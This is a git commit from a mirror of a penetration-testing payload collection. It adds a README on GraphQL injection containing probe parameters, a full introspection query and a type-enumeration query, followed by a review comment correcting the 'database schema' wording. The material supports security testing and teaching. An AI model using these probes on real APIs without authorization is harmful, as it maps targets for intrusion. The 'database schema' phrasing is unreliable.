mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git (synced 2024-11-10 07:04:22 +00:00)
Added GraphQL injection notes
parent 450de2c90f
commit 007a1eda83
1 changed file with 130 additions and 0 deletions

130 GraphQL Injection/README.md (Normal file)
@@ -0,0 +1,130 @@
# GraphQL injection

GraphQL is a query language for APIs and a runtime for fulfilling those queries with existing data.

## Exploit

Identify an injection point

```
?param={__schema{types{name}}}
```
Check if errors are visible

```
?param={__schema}
?param={}
?param={thisdefinitelydoesnotexist}
```

Enumerate Database Schema with the following GraphQL query

```
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

```

Enumerate the definition of interesting types using the following GraphQL query, replacing "User" with the chosen type

```
{__type (name: "User") {name fields{name type{name kind ofType{name kind}}}}}
```

## References

* [Introduction to GraphQL](https://graphql.org/learn/)
* [GraphQL Introspection](https://graphql.org/learn/introspection/)
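Review bot: "Enumerate Database Schema with the following GraphQL query" (the line introducing the IntrospectionQuery block) is inaccurate; introspection returns the GraphQL API schema that the server chose to expose (types, fields, arguments, directives), not the backing database schema, so rephrase it as "Enumerate the API schema with the following introspection query". Two smaller points in the same hunk: the `?param=` probes under "Identify an injection point" and "Check if errors are visible" never say how the query reaches the server, and since most GraphQL endpoints read it from a GET `query` parameter or from a POST JSON body such as `{"query": "{__schema{types{name}}}"}`, one sentence saying that `param` is a placeholder for whichever parameter or body field the target parses would save readers a false negative; and the `## Exploit` section contains only reconnaissance (introspection and `__type` enumeration), so either rename it or state that these steps come before the actual injection or abuse of a discovered field.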